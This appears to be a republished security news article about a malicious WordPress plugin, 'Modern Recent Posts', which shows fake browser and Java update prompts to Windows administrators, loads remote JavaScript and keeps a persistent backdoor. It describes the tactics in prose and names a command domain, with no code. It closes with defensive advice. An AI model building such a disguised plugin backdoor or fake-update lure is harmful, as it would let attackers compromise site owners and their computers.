Targeted Attack via Malicious Plugin
A disruptive campaign has emerged, targeting WordPress administrators through a nefarious plugin known as “Modern Recent Posts.” This insidious add-on generates fraudulent notifications for browser and Java updates, leveraging social engineering to deceive users.
- Malware Tactics: The illicit campaign cunningly manipulates administrators of Windows systems into downloading and executing harmful software.
- Covert Mechanism: The plugin covertly injects malicious JavaScript sourced from a remote command-and-control server, incorporating self-update and self-destruction functionalities designed to elude detection.
Upon installation, this backdoor retains access to the compromised website, even if passwords are subsequently altered.
Malicious Plugin Hijacks Admin Dashboard with Deceptive Updates
The attack exploits the principles of social engineering, instilling urgency in users to “update” software to avert potential security threats. Sucuri has meticulously chronicled this campaign, unveiling an intricate WordPress plugin that features multiple malicious capabilities.
This plugin scrutinizes user roles, ensuring only those with administrator privileges can be targeted while also validating that the User-Agent string corresponds to a Windows operating system.
Once these parameters are satisfied, the plugin retrieves a JavaScript payload from a remote server, subsequently triggering the fraudulent update overlay.
The malware incorporates a persistence mechanism, drawn from persistence.js. store, which is currently detected across 28 websites. This enables attackers to either remotely update or eliminate the backdoor, solidifying its lingering presence.
Crucially, the most significant threat posed by this malware lies not within the website but rather on the administrator’s local machine. Interacting with the counterfeit update button initiates the download of an executable file, potentially leading to the installation of ransomware, information stealers, or Remote Access Trojans (RATs).
Strategies for Mitigating WordPress Security Vulnerabilities
To counteract these potential WordPress security threats, administrators are advised to expeditiously remove any unrecognized plugins. In the event that users engaged with the fraudulent update prompt, it is imperative to conduct a thorough malware scan on affected local machines.
Some recommendations include:
- Conducting an audit of all installed plugins and user accounts,
- Resetting credentials and implementing robust password policies,
- Employing a Web Application Firewall (WAF) to obstruct traffic to known malicious domains,
- Updating the WordPress core, alongside all plugins and themes, to their latest versions,
- Monitoring outbound traffic for connections to unfamiliar or dubious domains.
Sucuri has also indicated that concealed WordPress backdoors, masquerading as plugins, have been responsible for creating rogue admin accounts. Attackers often leverage elements from legitimate plugins to establish these hidden access points.
Source link: Technadu.com.
